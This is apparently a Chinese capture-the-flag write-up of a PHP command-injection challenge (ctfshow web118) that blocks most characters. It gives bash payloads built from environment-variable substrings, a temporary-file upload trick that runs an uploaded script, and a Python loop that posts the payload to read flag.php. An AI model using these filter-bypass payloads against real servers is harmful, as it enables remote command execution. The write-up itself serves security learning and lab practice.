[ctfshow web入门] web118

信息收集

遇事不决先抓包,发现源代码里有注释

输入一些命令,出现evil input,直到尝试到单个字母还是evil input,我的记忆里搜索到,可能是过滤单个字符的题目,那时候我还专门跑了过滤了哪些字符的

使用burpsuite抓包,发送到intruder

得到的结果有两种长度,一种是1155一种是1165,1165包含了evil input字符串

被禁用的字符包括

s 复制代码
%00-%0F
! " % & ' ( ) * + , -  /
0-9
< = > `
a-z
|

还剩下大写字母以及关键的$


解题

临时文件上传

[ctfshow web入门] web56有提到,使用临时文件上传

这里没有了/,使用上面的信息构造一个

中括号还在,但是减号没了,所以我们直接把大写字母写上就行

shell 复制代码
// ${HOME:0:1} = /
${HOME:${#}:${#SHLVL}}
//${HOME:1:1} = h
${HOME:${#SHLVL}:${#SHLVL}}

我怕不够准确所以填了一个h进去,h构造也很简单

其他的太复杂了,我就不构造了,也容易出错,如果不行再继续加码

shell 复制代码
. /tmp/php??????
. /???/?h??????A  这里把最后一个大写字母写作A,一定要在六个随机字母里选一个写成大写字母,否则定位不到
. ${HOME:${#}:${#SHLVL}}???${HOME:${#}:${#SHLVL}}?${HOME:${#SHLVL}:${#SHLVL}}??????A

先试一下有没有evil input

py 复制代码
import requests
from time import sleep

url = "http://8e524b2c-2846-42f6-879c-0ea2627207dc.challenge.ctf.show/"  # http不要s
# . /tmp/php?????A ==> . /???/?h??????A
payload = ". ${HOME:${#}:${#SHLVL}}???${HOME:${#}:${#SHLVL}}?${HOME:${#SHLVL}:${#SHLVL}}??????A"
file = { "file": "tac flag.php" }
data = { "code": payload }

for i in range(1000):
    response = requests.request("POST", url, files=file, data=data)
    if (len(response.text)) != 479: # len可能需要微调
        print(response.text)
        print(len(response.text))
        break
    print(i, end=" ")
    sleep(0.3)

我这里运气好,一下子就跑出来了

截图里的post_url我就不改了,反正没影响,这是抄之前代码没好好读造成的


答案

还记得之前用$和大写字母拼空格吗,其实还是可以拼好shell

我认为这样的答案可行性并不高,因为无法使用打印,所以无法知晓那些环境变量的具体值,这能构造出来一个纯属运气

反正我的知识储备不够,拼不出来,直接看答案了

shell 复制代码
${PATH:${#HOME}:${#SHLVL}}${PATH:${#RANDOM}:${#SHLVL}} ?${PATH:${#RANDOM}:${#SHLVL}}??.???

${PATH:~A}${PATH:${#TERM}:${SHLVL:~A}} ????.???

${PATH:~A}${PWD:~A}${IFS}????.???

当然这是题目,这些信息可以从web29题目中获取的,但并不能保证和本题完全一致

shell 复制代码
$PWD		/var/www/html
$HOME		/home/www-data
~A			-1
${#SHLVL}	1,$SHLVL是2,表示有两个打开的bash,一般不会超过9
${#RANDOM}	4或5
$PATH		/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
${IFS}		空格
${#TERM} 	//没收集到,猜测是5 xtern vt100 vt220长度都是5,而配合答案nl这刚好是${PATH:5}的l

自己组一个echo,可惜不知道为什么失败了,不然就能印证我上面收集到的数据是正确的,也能拿到上面那些环境变量的真实数据了

shell 复制代码
e=${${${${HOME:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}:${#SHLVL}}
c=${${${${${${${PATH:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}:${#SHLVL}}
h=${HOME:${#SHLVL}:${#SHLVL}}
o=${${PATH:${#SHLVL}}:${#SHLVL}:${#SHLVL}}

${${${${HOME:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}:${#SHLVL}}${${${${${${${PATH:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}:${#SHLVL}}${HOME:${#SHLVL}:${#SHLVL}}${${PATH:${#SHLVL}}:${#SHLVL}:${#SHLVL}}${IFS}

上面代码的生成脚本

py 复制代码
def get_string(s, n):
    res = ""
    res += '${' * n + s + ':${#SHLVL}''}' * n
    return res[:-1]+':${#SHLVL}}'

print(get_string('PATH', 2))

web77    目录    web119

相关推荐
Brilliant Nemo2 分钟前
Vue2项目中使用videojs播放mp4视频
开发语言·前端·javascript
酷爱码27 分钟前
Linux实现临时RAM登录的方法汇总
linux·前端·javascript
LuckyLay29 分钟前
Vue百日学习计划Day16-18天详细计划-Gemini版
前端·vue.js·学习
神经毒素30 分钟前
WEB安全--Java安全--shiro550反序列化漏洞
java·安全·web安全·shiro
想要飞翔的pig1 小时前
uniapp+vue3页面滚动加载数据
前端·vue.js·uni-app
HarryHY1 小时前
git提交库常用词
前端
SoraLuna1 小时前
「Mac畅玩AIGC与多模态41」开发篇36 - 用 ArkTS 构建聚合搜索前端页面
前端·macos·aigc
霸王蟹1 小时前
React Fiber 架构深度解析:时间切片与性能优化的核心引擎
前端·笔记·react.js·性能优化·架构·前端框架
benben0441 小时前
Unity3D仿星露谷物语开发44之收集农作物
前端·游戏·unity·游戏引擎
会功夫的李白1 小时前
uniapp自动构建pages.json的vite插件
前端·uni-app·vite